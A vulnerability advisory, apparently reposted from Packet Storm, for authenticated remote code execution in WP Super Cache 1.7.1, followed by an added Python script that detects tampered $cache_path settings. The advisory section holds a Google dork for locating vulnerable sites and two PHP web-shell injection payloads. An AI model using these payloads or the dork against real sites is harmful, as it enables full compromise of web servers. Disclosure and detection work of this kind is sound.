WordPress WP Super Cache 1.7.1 Remote Code Execution ≈ Packet Storm – Digitalmunition





Published on March 30th, 2021


# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 – Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: <= 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/

### -- [ Info: ]

[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.

[i] The RCE is caused by an input validation failure and a weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.

[i] Another possible attack vector: from XSS to RCE.

### -- [ Impact: ]

[~] Full compromise of the vulnerable web application and also the web server.

### -- [ Payloads: ]

[$] ‘;system($_GET[13]);include_once ‘wp-cache-config.php’;’

[$] ‘;`$_GET[13]`;include_once ‘wp-cache-config.php’;?>
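
A defender-side check for the tampering described in the Info section, as an added example that is not part of the original advisory or the plugin's own code: it scans the text of wp-cache-config.php and reports any $cache_path assignment that is anything other than one plain quoted directory. The assumed line format (`$cache_path = '<dir>'; //Added by WP-Cache Manager`), the name `audit_cache_path` and both sample files are assumptions constructed for illustration.

```python
import re

# Assumption: a legitimate setting is ONE string literal on one line, e.g.
#   $cache_path = '/var/www/html/wp-content/cache/'; //Added by WP-Cache Manager
#   $cache_path = WP_CONTENT_DIR . '/cache/';
SAFE_LINE = re.compile(
    r"""^\$cache_path\s*=\s*
        (?:WP_CONTENT_DIR\s*\.\s*)?   # optional default prefix
        '[A-Za-z0-9_./:\\ -]*'        # single quoted directory, path characters only
        \s*;\s*
        (?://[\w .-]*)?$              # optional plain comment (cannot hold a PHP close tag)
    """,
    re.VERBOSE,
)
ASSIGNMENT = re.compile(r"^\$cache_path\s*=")

def audit_cache_path(config_text):
    """Return [(line_number, line)] for each $cache_path assignment that
    carries more than a single plain directory string."""
    findings = []
    for number, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.strip()
        if ASSIGNMENT.match(line) and not SAFE_LINE.match(line):
            findings.append((number, line))
    return findings

# Constructed sample: untouched configuration.
CLEAN_SAMPLE = (
    "<?php\n"
    "$cache_path = '/var/www/html/wp-content/cache/'; //Added by WP-Cache Manager\n"
    "$cache_enabled = true;\n"
)

# Constructed sample: the quoted value was closed early and a statement
# appended, using a harmless echo as the marker.
TAMPERED_SAMPLE = (
    "<?php\n"
    "$cache_path = '/tmp/';echo 'INJECTED';'/'; //Added by WP-Cache Manager\n"
    "$cache_enabled = true;\n"
)

if __name__ == "__main__":
    for name, text in (("clean", CLEAN_SAMPLE), ("tampered", TAMPERED_SAMPLE)):
        print(name, audit_cache_path(text))
```

A finding means the file should be restored from a known-good copy and the plugin updated past 1.7.1; blocking direct web access to wp-cache-config.php removes the exposure the advisory relies on.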